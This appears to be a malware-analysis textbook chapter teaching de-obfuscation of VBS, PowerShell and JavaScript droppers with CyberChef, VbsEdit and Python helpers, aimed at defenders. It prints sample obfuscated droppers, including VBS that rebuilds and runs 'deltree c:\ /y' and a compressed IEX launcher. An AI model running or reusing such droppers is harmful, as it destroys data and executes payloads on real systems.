Often during malware analysis, a malicious binary is not the initial stage that is presented to the end user. Frequently, an initial "dropper" in the form of a script (be it PowerShell, Visual Basic Scripting (VBS), a malicious Visual Basic for Applications (VBA) macro, JavaScript, or anything else) is responsible for the initial infection and implantation of the binary.
This has been the case in modern times with malware families such as Emotet, Qakbot, TrickBot, and many others. Historically, scripts have also comprised the entirety of a malware family; for instance, ILOVEYOU, an infamous virus from 2000, was written in Microsoft's own VBScript (VBS) language.
In this chapter, we'll examine techniques that will assist us with de-obfuscating malicious scripts, a task somewhat akin to attempting to push toothpaste back into a tube after it's already been dispensed.
At the end of the chapter, you'll also have the opportunity to test the skills you've acquired by de-obfuscating malicious scripts provided during the course of the chapter!
We'll cover the following topics:
These are the technical requirements for this chapter:
Several obfuscation techniques are common across scripting languages, and it's important that we understand what is being done to slow down analysis of a dropper or piece of malware and hinder incident response. In this section, we'll briefly review some of the more common techniques that adversaries use to prevent analysis.
One of the more common techniques utilized within PowerShell, VBS, and VBA malicious scripts is the encoding of strings. Encoding strings, or function and variable names, makes the code harder to follow and analyze, as it is no longer written in plain English (or any other human-readable language). Several encoding schemes are in use; we'll cover the most popular ones.
Base64 is a binary-to-text encoding scheme: it accepts arbitrary bytes, including any American Standard Code for Information Interchange (ASCII) text, and produces output that is no longer easily human-readable, as illustrated here:
Figure 8.1 – Utilizing the Base64 application to create encoded strings
As you can see, the string appears as though it may be random text, but does in fact easily decode from the VGhpcyBpcyBhIG1hbGljaW91cyBzdHJpbmcu value back to the text that was provided to the Base64 algorithm.
We can recognize Base64 by understanding the alphabet that is utilized. In short, Base64 uses the A-Za-z0-9+/ character set, with = reserved for padding. That is to say, Base64 can utilize all uppercase and lowercase A-Z ASCII characters, the digits 0-9, the plus sign, and the forward slash, along with up to two trailing equals signs for padding.
Analysis tip
Padded Base64 strings always have a length divisible by four, because every 4-character group encodes 3 bytes of input. When the input length is not a multiple of three, one or two '=' characters are appended as padding to complete the final 4-character group. If you recognize a string that fits these alphabet and length requirements, chances are it's Base64.
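To make these rules concrete, here is a minimal Python sketch of a triage check. The looks_like_base64 helper is our own hypothetical name and is not part of any tool. It tests the standard alphabet, the length rule, and whether the standard library's base64 module can actually decode the string. URL-safe and unpadded Base64 variants are deliberately out of scope, and short ordinary words such as deadbeef also pass, so treat a match as a lead rather than proof.

```python
import base64
import binascii
import re

# Standard Base64 alphabet, followed by at most two '=' padding characters
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def looks_like_base64(candidate: str) -> bool:
    """Heuristic: right alphabet, length divisible by four, and decodes cleanly."""
    if len(candidate) % 4 != 0 or not B64_RE.match(candidate):
        return False
    try:
        base64.b64decode(candidate, validate=True)
    except binascii.Error:
        return False
    return True

sample = "VGhpcyBpcyBhIG1hbGljaW91cyBzdHJpbmcu"
if looks_like_base64(sample):
    print(base64.b64decode(sample).decode("ascii"))  # This is a malicious string.
```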
In order to decode our identified Base64 strings, we can utilize the CyberChef tool from Government Communications Headquarters (GCHQ), located at https://gchq.github.io/CyberChef/. The tool can be seen in the following screenshot:
Figure 8.2 – Utilizing CyberChef to decode Base64 strings
Once we've selected the From Base64 recipe and pasted our input string into the Input box, CyberChef will automatically run it through the Base64 decoding algorithm and present us with the corresponding ASCII string.
Recognizing Base64 is key to being able to de-obfuscate scripts and understand what steps threat actors are taking in order to hide their actions from analysts. However, it is not the only encoding scheme that is in use.
Other Base-encoding alphabets include Base62, Base58, and Base85, though the 64 variant is by far the most popular. Key to understanding all of these variants is knowing the alphabet each encoding algorithm uses, so that we can quickly recognize and differentiate between them.
The following table outlines the key alphabet differences between each of the encoding algorithms:
Table 8.1 – The alphabets of Base-encoding algorithms
With this knowledge, it becomes much easier to tell the encoding schemes apart, decode them accordingly, and see what malicious behavior the threat actor we are examining has hidden within their dropper code. Keep in mind that the alphabets overlap (a Base58 string, for example, is also valid Base62 and Base64 text), so the alphabet narrows down the candidates rather than proving which scheme is in use.
Another popular encoding method is to utilize the numerical representations of ASCII characters. In ASCII, each character is assigned a number, or ordinal. The table shown in the following screenshot lists each code alongside the ASCII character it represents:
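The alphabets can also be compared programmatically. The following Python sketch uses a hypothetical candidate_encodings helper to report which schemes could have produced a given string. It assumes the Bitcoin-style Base58 alphabet and the Ascii85 flavor of Base85. Other variants of both exist, so adjust the sets to match what you encounter.

```python
import string

# Character sets for common Base-N encodings. Base58 is the Bitcoin-style alphabet
# (no 0, O, I, or l). Base85 is the Ascii85 variant, '!' through 'u', ignoring its
# 'z' shorthand. Other Base85 alphabets (RFC 1924, Z85) differ.
ALPHABETS = {
    "Base58": set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"),
    "Base62": set(string.digits + string.ascii_letters),
    "Base64": set(string.digits + string.ascii_letters + "+/="),
    "Base85": {chr(code) for code in range(ord("!"), ord("u") + 1)},
}

def candidate_encodings(data: str) -> list[str]:
    """Return every encoding whose alphabet contains all of the characters in data."""
    chars = set(data)
    return [name for name, alphabet in ALPHABETS.items() if chars <= alphabet]

print(candidate_encodings("VGhpcyBpcyBhIG1hbGljaW91cyBzdHJpbmcu"))  # ['Base62', 'Base64']
```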
Figure 8.3 – The ASCII ordinal table
These ASCII codes may be substituted for variable names or strings and decoded back into meaningful strings or code at runtime, using built-in functions such as Chr() in VBS (or a [char] cast in PowerShell), and then passed to another function within the code for execution. Let's take a look at the following example:
Dim Var1
Var1 = "099 109 100 046 101 120 101 032 047 099 032 100 101 108 116 114 101 101 032 099 058 092 032 047 121"
Function func1(varStr)
    On Error Resume Next
    Dim parts, i, varStr2, oShell
    ' Convert each space-delimited ordinal back into its character
    parts = Split(varStr, " ")
    For i = 0 To UBound(parts)
        varStr2 = varStr2 & Chr(CInt(parts(i)))
    Next
    ' Hand the rebuilt command line to a WScript.Shell instance for execution
    Set oShell = WScript.CreateObject("WScript.Shell")
    oShell.Run varStr2
End Function
func1 Var1
In the preceding example, a space-delimited group of ASCII ordinals is first converted back to regular characters using VBS's built-in Chr() function. The result is then passed to a newly created WScript.Shell instance, which executes the malicious string as a command on the command line:
Figure 8.4 – Converting ASCII ordinals back to text
CyberChef has no recipe labeled specifically for ASCII ordinals. However, its From Decimal recipe, with the delimiter set to Space, converts decimal character codes such as these back into text, and many standalone converters can also be found online. Copying the preceding ordinal string into either should reveal the malicious command that is being run.
Base encoding is not the only technique available to malware authors. Besides Base encodings and ASCII ordinals, authors can also use hexadecimal notation, which obfuscates the script while still allowing easy conversion back to executable code.
Hexadecimal is fairly easy to recognize, based on its short alphabet and usual notations. The hexadecimal alphabet is simply A-F0-9, that is, the letters A-F and the digits 0-9, and case does not matter. If a string contains any letter beyond F in the alphabet (ignoring delimiters such as 0x or \x), you can rest assured that it is not, in its current form, hexadecimal notation.
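If you'd rather not paste a potentially destructive command into a website, the decoding is easy to reproduce offline. This Python sketch uses a hypothetical decode_ordinals function that mirrors what the VBS Chr() loop does. It assumes space-delimited decimal codes. It only returns the text and never executes it.

```python
def decode_ordinals(ordinals: str, sep: str = " ") -> str:
    """Convert a delimited string of decimal ASCII codes back into text, like VBS Chr()."""
    return "".join(chr(int(code)) for code in ordinals.split(sep) if code)

encoded = ("099 109 100 046 101 120 101 032 047 099 032 100 101 108 116 114 "
           "101 101 032 099 058 092 032 047 121")
print(decode_ordinals(encoded))  # cmd.exe /c deltree c:\ /y
```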
Analysis tip
Various delimiters are used in hexadecimal notation, including 0x, \x, %, CRLF, LF, and spaces. However, they all perform the same function: separating each byte (one pair of hexadecimal digits) from the next.
We can take a look at several examples, and utilize CyberChef as we did with Base encoding to decode our samples. Let's try the following strings:
The following screenshot shows hexadecimal characters being converted to ASCII characters in CyberChef:
Figure 8.5 – Converting hexadecimal to ASCII characters in CyberChef
Using the From Hex recipe within CyberChef, we can select the delimiter that separates each byte (2-character pair) of our string, or leave it on Auto to let CyberChef decide, and get the correct output returned!
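The same conversion can be scripted. The following Python sketch uses decode_hex, a hypothetical helper of our own. It assumes the delimiters listed in the preceding analysis tip, plus commas and colons. It strips them and then lets bytes.fromhex turn each two-digit pair into a byte. It also assumes that the decoded bytes are ASCII.

```python
import re

# Delimiters commonly seen between hex bytes: 0x and \x prefixes, %, commas,
# colons, and any whitespace (spaces, CRLF, LF)
HEX_DELIMITERS = re.compile(r"0x|\\x|[%,:\s]", re.IGNORECASE)

def decode_hex(data: str) -> str:
    """Strip delimiters, then convert each pair of hex digits (one byte) to a character."""
    cleaned = HEX_DELIMITERS.sub("", data)
    return bytes.fromhex(cleaned).decode("ascii")

for sample in ("63 6d 64 2e 65 78 65", "0x63,0x6d,0x64", r"\x63\x6d\x64", "%63%6D%64"):
    print(decode_hex(sample))  # cmd.exe, then cmd three times
```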
Obviously, encoding is not the only tool that can be utilized by malware authors to obfuscate their payloads. In the next few sections, we'll take a look at other methodologies, starting with string concatenation.
A common way for a malicious author to hide their intentions and make scripted instructions difficult to read is to concatenate multiple separate strings in order to form a complete command.
In essence, several chunks of code are separately stored in various variables that do not make sense on their own and are then later combined into a single string that makes sense when their execution is required.
To make more sense of this technique, we can take a look at an example here:
$var1 = "scri"
$var2 = "pt.she"
$var3 = "ll"
$var4 = "w"
# "w" + "scri" + "pt.she" + "ll" evaluates to "wscript.shell"
$var5 = New-Object -ComObject ($var4 + $var1 + $var2 + $var3)
The preceding example is in Windows PowerShell. It concatenates four variables and passes the result (wscript.shell) to the New-Object cmdlet. It's fairly obvious in this example that the malicious actor is creating a new WScript.Shell COM object through which to run further malicious commands.
While it is not always this obvious what the author intended in their string concatenation, several variables being chained together in arguments should be an immediate cause for concern, and string concatenation should be assumed by the examining analyst.
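For simple cases like this one, the concatenation can be resolved statically without running anything. This Python sketch uses resolve_concat, a hypothetical name. It assumes that every piece is assigned as a plain double-quoted literal and joined with +. Real droppers often nest expressions, and in that case a debugger is the more reliable route.

```python
import re

# $name = "literal" assignments (double-quoted literals only; an assumed, simple form).
# Later assignments to the same name overwrite earlier ones in the dict.
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"')

def resolve_concat(script: str, expression: str) -> str:
    """Statically rebuild a ($a + $b + ...) expression from literal assignments."""
    values = dict(ASSIGN_RE.findall(script))
    names = [part.strip().lstrip("$") for part in expression.strip("() ").split("+")]
    return "".join(values[name] for name in names)

script = '''
$var1 = "scri"
$var2 ="pt.she"
$var3 = "ll"
$var4 = "w"
'''
print(resolve_concat(script, "($var4 + $var1 + $var2 + $var3)"))  # wscript.shell
```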
A close cousin of string concatenation, string replacement inserts meaningless junk data into the middle of otherwise executable strings and strips it back out at runtime. Let's take a look at an example of string replacement to understand its impact:
$var1 = "cmAQGlXFeGhOd.exe /c AQGlXFeGhO%appAQGlXFeGhOdaAQGlXFeGhOta%malwAQGlXFeGhOare.exAQGlXFeGhOeAQGlXFeGhO"
# Strip the junk token at runtime, then split the executable from its arguments
$parts = ($var1 -replace "AQGlXFeGhO", "") -split " ", 2
Start-Process -FilePath $parts[0] -ArgumentList $parts[1]
In the preceding example, a randomly generated string has been inserted repeatedly into an otherwise valid command. This makes the command quite difficult to read at a glance without either superhuman powers or considerable effort. However, it still executes easily at runtime, because PowerShell's -replace operator removes the junk characters before the Start-Process cmdlet is called, as illustrated here:
Figure 8.6 – String replacement in a CARBON SPIDER dropper
Often, string replacement can be utilized in combination with concatenation to create code that is very difficult to read and time-consuming to reverse for an analyst.
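String replacement can likewise be undone statically. The following Python sketch uses undo_string_replacement, a hypothetical helper. It looks for clauses of the form -replace "junk", "" and applies them to the whole script. Like PowerShell's -replace, it treats the pattern as a case-insensitive regular expression. Note, however, that Python's regex dialect differs from .NET's in some edge cases.

```python
import re

# A  -replace "junk", ""  clause: double-quoted pattern, empty replacement (assumed form)
REPLACE_CLAUSE = re.compile(r'-replace\s+"([^"]+)"\s*,\s*""', re.IGNORECASE)

def undo_string_replacement(script: str) -> str:
    """Apply each -replace "junk", "" clause found in the script to the whole script."""
    for junk in REPLACE_CLAUSE.findall(script):
        # PowerShell's -replace treats its pattern as a case-insensitive regex
        script = re.sub(junk, "", script, flags=re.IGNORECASE)
    return script

sample = (
    '$var1 = "cmAQGlXFeGhOd.exe /c AQGlXFeGhO%appAQGlXFeGhOdaAQGlXFeGhOta%malwAQGlXFeGhOare.exAQGlXFeGhOeAQGlXFeGhO"\n'
    '$parts = ($var1 -replace "AQGlXFeGhO", "") -split " ", 2'
)
print(undo_string_replacement(sample))  # first line: $var1 = "cmd.exe /c %appdata%malware.exe"
```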
Playing with strings in various ways is not the only way that malware authors can obfuscate the true objective of their code. There are various other methods employed, often in combination with encoding, substitution, and concatenation methodologies.
In normal coding, it's generally important to give functions and variables meaningful names so that future programmers who work on your project can understand the execution flow and the reasoning behind the decisions you made while creating the script or program.
This is not the case in malware. In malicious scripts, it's often the case that variables, functions, and arguments passed to these functions are given random, meaningless, or outright misleading names in order to purposefully hinder analysis of the dropper in question, as can be seen in the following example:
Figure 8.7 – Useless, random variable names in a Qakbot dropper
Another method is to insert code that does nothing. The primary purpose of the script might be accomplished in 5-10 lines of code, yet the dropper may include hundreds or thousands of lines. These include functions that are never called, or that only return null values to the main function, and that never affect the execution flow of the dropper. An example of this can be seen here:
Figure 8.8 – A function that does nothing and returns no values in a Qakbot dropper
The impact of this is that it makes it far more difficult for an analyst or heuristic code analyzer to locate the true beginning of execution of the malicious script.
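Dead code can be partly triaged automatically. This Python sketch uses uncalled_routines, a hypothetical name, to list VBScript Function and Sub blocks whose names never appear outside their own definitions. It is only a heuristic. It assumes that routines are not nested. Calls made indirectly, for example through Execute or GetRef with a constructed string, will make live code look dead.

```python
import re

# Rough pattern for a VBScript Function/Sub block (assumes no nested definitions)
ROUTINE_RE = re.compile(
    r"^[ \t]*(?:(?:Public|Private)[ \t]+)?(?:Function|Sub)[ \t]+(\w+)"
    r".*?^[ \t]*End[ \t]+(?:Function|Sub)\b",
    re.IGNORECASE | re.MULTILINE | re.DOTALL,
)

def uncalled_routines(vbs: str) -> list[str]:
    """List Functions/Subs whose names never appear outside their own definitions."""
    unused = []
    for match in ROUTINE_RE.finditer(vbs):
        name = match.group(1)
        # Cut the routine out so its own return-value assignments are not counted as calls
        rest = vbs[: match.start()] + vbs[match.end():]
        if not re.search(rf"\b{re.escape(name)}\b", rest, re.IGNORECASE):
            unused.append(name)
    return unused

vbs = 'Function Junk1(a)\n    Junk1 = a * 0\nEnd Function\n\nSub Main()\n    WScript.Echo "hi"\nEnd Sub\n\nMain\n'
print(uncalled_routines(vbs))  # ['Junk1']
```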
Now that we have a good understanding of some of the methodologies that threat actors may employ, we can examine how to begin de-obfuscating the malicious scripts and droppers these actors use.
In this section, we'll take a look at some of the methodologies we've learned about and learn a few shortcuts to de-obfuscating malicious VBS and VBA scripts within our Windows virtual machine (VM) to understand what the malicious author may be attempting to accomplish.
Malicious VB scripts are among the most common methods in use throughout the history of malware, as VBScript is easy to write, easy to learn, ubiquitous, and powerful within the environment that comprises most malware targets: Windows.
A free tool, VbsEdit, is one of the best ways to approach de-obfuscation of VB-based scripts. The tool can be obtained from the link within the Technical requirements section at the beginning of this chapter.
Once the tool is downloaded, proceed through the installation, accepting default options—they'll work perfectly.
Of note, the tool does have an optional license but it is not required, and the evaluation period does not expire.
Once open, click Evaluate within the prompt, and proceed to the main window.
Here, we'll open a malicious VBS example from the CARBON SPIDER threat actor to examine what information we can pull out of the script via debugging and evaluation, utilizing the VbsEdit tool. The tool can be seen in the following screenshot:
Figure 8.9 – The Open button in VBSEdit
First, we'll utilize the Open button and then load our selected script from the filesystem. Once we've done this, we can simply click Start Debugging with CScript and allow the script to run, as illustrated in the following screenshot:
Analysis tip
Debugging the script is dynamic! The malicious script will be executed on your system as a result of running this. Ensure that you are properly sandboxed, as outlined in previous chapters, before running this!
Figure 8.10 – The obfuscated CARBON SPIDER dropper
Once the script has finished running, a new tab will appear entitled eval code:
Figure 8.11 – The evaluated code tab within VbsEdit
Upon clicking this, you'll see that the obfuscated actions within the code have been transformed into fairly readable code! Unfortunately, it's all on a single line—but with some quick formatting changes, we'll have the full, de-obfuscated script.
Thankfully, the evaluated code uses a standard delimiter: the colon, VBScript's statement separator, denotes each new command. Using Notepad++'s Find and Replace feature with the Extended search mode allows us to replace each instance of a colon with \r\n, the carriage return and line feed pair that Windows uses for a new line. This is illustrated in the following screenshot:
Figure 8.12 – Finding and replacing the delimiter within Notepad++
Once we utilize this delimiter to replace the colons, Notepad++ will basically format the entirety of the dropper for us, as illustrated in the following screenshot:
Figure 8.13 – Perfectly formatted, totally de-obfuscated CARBON SPIDER dropper
Being sure to skip valid uses of a colon within the script's strings (Uniform Resource Locators (URLs), Windows Management Instrumentation (WMI) commands, and so on), we can replace each separator with a new line and obtain a full copy of the malicious script!
While VbsEdit is arguably the best way to de-obfuscate malicious VBS scripts, it certainly isn't the only one. We can also use built-in utilities such as WScript's Echo method.
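If you'd rather not pick out valid colons by hand, the split can be scripted. The following Python sketch uses split_vbs_statements, a hypothetical helper. It splits the evaluated one-liner only on colons that fall outside double-quoted string literals, so that colons inside URLs and WMI paths survive. It does not handle colons inside ' comments.

```python
def split_vbs_statements(code: str) -> list[str]:
    """Split one-line VBScript on ':' separators that sit outside "..." literals."""
    statements, current, in_string = [], [], False
    for ch in code:
        if ch == '"':
            # VBScript escapes a quote as "", which toggles twice and leaves the state intact
            in_string = not in_string
        if ch == ":" and not in_string:
            statements.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    statements.append("".join(current).strip())
    return [s for s in statements if s]

one_liner = 'Dim u:u = "http://example.com/a":Set s = CreateObject("WScript.Shell"):s.Run u'
print("\n".join(split_vbs_statements(one_liner)))
```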
In some instances, it may be useful to obtain the value of a single variable within a script as opposed to dynamically executing and obtaining a full copy of a de-obfuscated script. In these instances, Echo can be utilized within the script in order to obtain the value.
Simply locate where you believe the variable has been set to the value you'd like to return, and add a line that echoes it with WScript.Echo VariableName. While this method has its benefits, it's much more beneficial to use the previously discussed VbsEdit debugger to obtain a full copy of the script if you already have a properly configured detonation environment.
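Adding the Echo line can also be automated. This Python sketch uses add_echo_after_assignment, a hypothetical name, to insert WScript.Echo after the last line that assigns to a chosen variable. It assumes that the last assignment holds the final value and that it sits at the top level rather than inside a loop or branch. Remember to comment out the line that executes the payload before running the modified script, even inside your sandbox.

```python
import re

def add_echo_after_assignment(vbs: str, var: str) -> str:
    """Insert 'WScript.Echo <var>' after the last line that assigns to <var>."""
    assign = re.compile(rf"^\s*(?:Set\s+)?{re.escape(var)}\s*=", re.IGNORECASE)
    lines = vbs.splitlines()
    hits = [i for i, line in enumerate(lines) if assign.match(line)]
    if not hits:
        raise ValueError(f"no assignment to {var!r} found")
    # The last top-level assignment is assumed to hold the final (decoded) value
    lines.insert(hits[-1] + 1, f"WScript.Echo {var}")
    return "\n".join(lines)

vbs = 'x = "a"\nx = x & "b"\nCreateObject("WScript.Shell").Run x'
print(add_echo_after_assignment(vbs, "x"))
```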
While malicious VBS droppers are certainly still in vogue due to the ability to run them on any version of Windows in use today, other malicious scripts and droppers written in PowerShell also exist.
Perhaps one of the most common scripting languages in use for both malicious and legitimate administration purposes is the built-in Windows scripting engine based on .NET—PowerShell.
PowerShell has been embraced readily by threat actors, red teamers, and systems administrators alike to accomplish their ends due to its power.
As a result of this power, it's also incredibly easy to obfuscate PowerShell scripts in many different ways. We'll take a look at a few examples exclusive to PowerShell, and a real-world example utilized by Emotet!
First, we'll take a look at a few techniques that are generally unique to PowerShell malware samples.
The first method (which is one of the most commonly utilized obfuscation methods) is compression, as shown in the following code snippet:
.($pshOme[21]+$PsHomE[30]+'X') (NEw-obJECt iO.STREAmREAdER ( ( NEw-obJECt SyStEm.iO.cOMpREssIOn.DeflAtEstreaM([SYstEM.Io.MemoRYsTREaM] [sYSTEm.CONvERt]::FROMBAsE64sTRinG ('TcmxDkAwFAXQX5FOJLzuVmJkMHSxFDdReW1FX1L+3uqspxyRm2k9sUkxv0ngaYSQwdqxQ5CK+pgDR7sPjlGqQ+RKrdZ4rL8YtEWvveVsbxAeqLpQXbsYF/aY0/Kf6gM='),[SYSteM.iO.CoMPresSIOn.cOMPReSSIoNmoDE]::DECompReSS)), [sysTeM.TeXT.EncODinG]::asCIi) ).reAdtOENd()
As you can see, several obfuscation methods are layered here. The leading .($pshOme[21]+$PsHomE[30]+'X') builds the string ieX (the iex alias for Invoke-Expression) from characters of the $PSHOME path, so whatever the rest of the line produces will be executed. Base64 encoding is used to hide a string that is then fed to the .NET System.IO.Compression.DeflateStream class. Let's grab the Base64 string and paste it into CyberChef to try to decode what it holds, as follows:
Figure 8.14 – Binary data from a Base64-encoded string in CyberChef
Unfortunately, decoding the data appears to have returned binary as opposed to ASCII commands in this instance. No matter: CyberChef has another recipe that will be of use! Because the script passes the data to DeflateStream, we know that we should use the Raw Inflate recipe within CyberChef to reverse the compression applied during obfuscation, as illustrated in the following screenshot:
Figure 8.15 – Inflating the binary data from within CyberChef to return the ASCII command
With Raw Inflate interpreting the binary data, we can now see what the obfuscated command is attempting to do!
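Both layers of this one-liner can be reproduced in Python. The sketch below assumes the default 64-bit $PSHOME path (C:\Windows\System32\WindowsPowerShell\v1.0), where characters 21 and 30 spell ie. It mirrors CyberChef's From Base64 and Raw Inflate recipes with the standard base64 and zlib modules. The inflate_b64 name is hypothetical. Passing it the Base64 string from the snippet should mirror what CyberChef displays.

```python
import base64
import zlib

# Default 64-bit $PSHOME path (an assumption; it can differ between hosts)
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"
print(PSHOME[21] + PSHOME[30] + "X")  # ieX, i.e. the iex alias for Invoke-Expression

def inflate_b64(payload: str) -> str:
    """Mirror CyberChef's From Base64 followed by Raw Inflate."""
    compressed = base64.b64decode("".join(payload.split()))  # drop stray whitespace
    # wbits=-15: raw DEFLATE with no zlib/gzip header, as .NET's DeflateStream produces
    return zlib.decompress(compressed, wbits=-15).decode("ascii")

# Round-trip demo with our own payload, compressed the same raw-DEFLATE way
co = zlib.compressobj(wbits=-15)
demo = base64.b64encode(co.compress(b"Write-Output 'hello'") + co.flush()).decode()
print(inflate_b64(demo))  # Write-Output 'hello'
```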
PowerShell offers several methods for obfuscation that are unique to the language itself but fall within the categories previously covered. However, it's important to mention them in the context of PowerShell, since they can differ somewhat.
Command tokens (cmdlets) can be separated and obfuscated by utilizing backticks (grave accents) within the command token; for example, New-Object becomes N`ew-O`b`je`c`t. This is particularly powerful when combined with other methods.
Concatenation is not limited to variables within PowerShell—it can also be applied to command tokens and cmdlets—for example, New-Object could become & ('Ne'+'w-Ob'+'ject').
PowerShell generally ignores extra whitespace between tokens. When this is combined with backticks and string concatenation, it's possible to make even normal cmdlets very confusing. For example, New-Object may become & ( 'Ne' +'w-Ob' + 'ject' ) or similar.
Perhaps the most complex method is reordering. Here, the malicious author loads substrings of a command into an array and then uses PowerShell's -f format operator to pull each substring out of the array by index, re-concatenating them in the proper order. For example, see the following code snippet:
.("{1}{0}{2}"-f'e','N','w-Object')
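In this example, the substrings of New-Object are supplied to the -f format operator as an array with the following values: index 0 holds 'e', index 1 holds 'N', and index 2 holds 'w-Object'.
The {1}{0}{2} template then pulls each value out in the order that makes sense (1, 0, 2), rebuilding New-Object, which the leading . operator then executes!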
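The PowerShell-specific tricks above can be partially reversed with small text transformations. The following Python sketch uses two hypothetical helpers. The first, normalize_command_token, collapses a single obfuscated command name; applying it to a whole script would also mangle legitimate string contents. The second, resolve_format_operator, rewrites simple -f expressions, assuming a double-quoted template and single-quoted arguments.

```python
import re

def normalize_command_token(token: str) -> str:
    """Collapse a tick-, quote-, or concatenation-obfuscated command name."""
    # Drop a leading & or . call operator used to invoke the rebuilt name
    token = re.sub(r"^\s*[&.]\s*", "", token)
    # Remove backticks, quotes, '+' operators, parentheses, and whitespace
    return re.sub(r"[`'\"+()\s]", "", token)

# A double-quoted -f template followed by single-quoted arguments,
# e.g. "{1}{0}{2}"-f'e','N','w-Object'
FORMAT_RE = re.compile(r"\"([^\"]*)\"\s*-f\s*((?:'[^']*'\s*,?\s*)+)", re.IGNORECASE)

def resolve_format_operator(script: str) -> str:
    """Replace simple -f expressions with the single-quoted string they build."""
    def rebuild(match):
        args = re.findall(r"'([^']*)'", match.group(2))
        # Python's str.format uses the same {index} placeholders as PowerShell's -f
        return "'" + match.group(1).format(*args) + "'"
    return FORMAT_RE.sub(rebuild, script)

print(normalize_command_token("N`ew-O`b`je`c`t"))                         # New-Object
print(normalize_command_token("& ( 'Ne' +'w-Ob' + 'ject' )"))              # New-Object
print(resolve_format_operator(""".("{1}{0}{2}"-f'e','N','w-Object')"""))  # .('New-Object')
```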
With knowledge of these obfuscation techniques, let's now take a look at an example.
Let's take a look at an obfuscated Emotet PowerShell command in order to see if we can manage to de-obfuscate and extract the dropper domains from the script to find which domains we should be blocking requests to at our firewall. Let's look at the command, which can be found in the malware samples downloaded for this chapter in EMOTET.txt:
First, we can utilize the From Base64 recipe within CyberChef, which will decode and give us the output of the Base64-encoded string, as illustrated in the following screenshot:
Figure 8.16 – First step: decoding of the Emotet dropper
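We can see that there are also several null bytes within this command; CyberChef displays these as the '.' character. They appear because the command was encoded as UTF-16LE text (the encoding PowerShell's -EncodedCommand parameter expects), in which each ASCII character is followed by a null byte. We'll go ahead and remove these with the Remove null bytes recipe, as illustrated in the following screenshot: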
Figure 8.17 – Second step of decoding, with null bytes removed from the dropper
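Because the null bytes come from UTF-16LE encoding, the first two CyberChef steps can be reproduced in a single Python call. This sketch uses decode_encoded_command, a hypothetical name, and assumes the input is a complete, -EncodedCommand-style Base64 value.

```python
import base64

def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand style value (Base64 of UTF-16LE text)."""
    # Decoding as UTF-16LE consumes the interleaved null bytes that CyberChef shows as '.'
    return base64.b64decode(b64).decode("utf-16-le")

encoded = base64.b64encode("Write-Output 'hi'".encode("utf-16-le")).decode()
print(decode_encoded_command(encoded))  # Write-Output 'hi'
```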
We're definitely making some progress! However, we can see some fairly dense concatenation, utilizing what looks like the characters + and (), and whitespace. Utilizing Find / Replace recipes within CyberChef, we can substantially cut down on the noise the concatenation characters are causing, and smash all the characters back together, as illustrated in the following screenshot:
Figure 8.18 – Third step in decoding, with erroneous whitespace and concatenation characters removed
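The concatenation clean-up can also be expressed as a single regular expression. This Python sketch uses collapse_concatenation, a hypothetical name. It assumes that the fragments are single-quoted literals joined with +. Stray parentheses or other noise may still need a separate Find / Replace pass.

```python
import re

def collapse_concatenation(text: str) -> str:
    """Join adjacent single-quoted literals: 'ht'+'tp' becomes 'http'."""
    # Remove a closing quote, optional whitespace, '+', whitespace, and the next opening quote
    return re.sub(r"'\s*\+\s*'", "", text)

print(collapse_concatenation("('ht'+'tp://'+'exa' + 'mple.com')"))  # ('http://example.com')
```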
We're almost there! Now, it looks like we have only a few more steps. As we can see, where http(s) would normally appear, it seems to have been replaced with ah. We can create a simple find-and-replace regular expression (regex) rule to replace ah with http, as illustrated in the following screenshot:
Figure 8.19 – Extracting the URLs from the Emotet dropper
Once done, we can simply use the Extract URLs recipe to pull all of the command-and-control (C2) URLs out of the script!
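The last two steps can be chained in Python as well. This sketch uses extract_urls, a hypothetical name. It assumes that the dropper replaced http with ah (so https would appear as ahs) and that entries in the URL list are separated by @. Check the actual sample and adjust both patterns before relying on the output. The example.com addresses are placeholders, not IOCs from the sample.

```python
import re

def extract_urls(text: str) -> list[str]:
    """Restore the 'ah' scheme placeholder to http, then pull out URL-like strings."""
    # Assumes the dropper swapped "http" for "ah", so https:// appears as ahs://
    restored = re.sub(r"\bah(s?)://", r"http\1://", text)
    # Stop each URL at whitespace, quotes, or '@', assumed here to separate list entries
    return re.findall(r"https?://[^\s'\"@]+", restored)

print(extract_urls("ah://example.com/a/@ahs://test.example.org/b/"))
```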
Now that we have covered several different ways to de-obfuscate code semi-manually, let's take a look at some of the automated tools utilized by attackers, and some of their counterparts in incident response.
There are several tools that are useful for both obfuscating and de-obfuscating malicious scripts. We'll touch on several of these, and also their de-obfuscation counterparts.
Invoke-Obfuscation is a powerful tool written by an ex-Mandiant red-team employee. It can take existing PowerShell scripts that have not been obfuscated in any way and fully obfuscate them, both to evade detection by endpoint detection and response (EDR) tools and to make analysis more difficult for analysts. If you'd like to practice creating obfuscated scripts, the tool can be downloaded from https://github.com/danielbohannon/Invoke-Obfuscation. You can see the tool in action in the following screenshot:
Figure 8.20 – The splash screen and options for Invoke-Obfuscation
The blue-team counterpart to Invoke-Obfuscation is PSDecode, which attempts to work through a malicious PowerShell script, de-obfuscating it and reversing the compression or exclusive OR (XOR) methods used to hinder its analysis. PSDecode is shown in action in the following screenshot:
Figure 8.21 – Example output for PSDecode
This tool should be considered essential to any malware analyst's toolbox, and may be downloaded from https://github.com/R3MRUM/PSDecode.
There are many JavaScript obfuscation frameworks available—too many to name. However, the Metasploit JavaScript obfuscator is probably the most commonly used. An example of the output produced by the Metasploit JavaScript obfuscator is provided in the following screenshot:
Figure 8.22 – Example of obfuscated JavaScript by the Metasploit obfuscator
Obviously, this does not make for particularly readable code. Thankfully, the JSDetox tool, which can be downloaded from http://www.relentless-coding.com/projects/jsdetox/, can make short work of most JavaScript obfuscation. This is shown in the following screenshot:
Figure 8.23 – The same JavaScript, run through JSDetox
The preceding screenshot shows the de-obfuscated output, which makes for much more obvious code! We can now see that the payload is creating a backdoor with CLSID persistence, and that the payload is hosted on localhost on port 8080!
A plethora of tools exist for other languages. However, JavaScript, VBS, and PowerShell make up the vast majority of the malicious scripts you'll encounter, so these tools, combined with CyberChef and the ability to recognize encodings when you see them, will serve you well as an analyst!
Utilizing CyberChef, any automated tools covered, and the Qakbot.txt and EMOTET_2.txt samples within the Technical requirements section, attempt to answer the following questions:
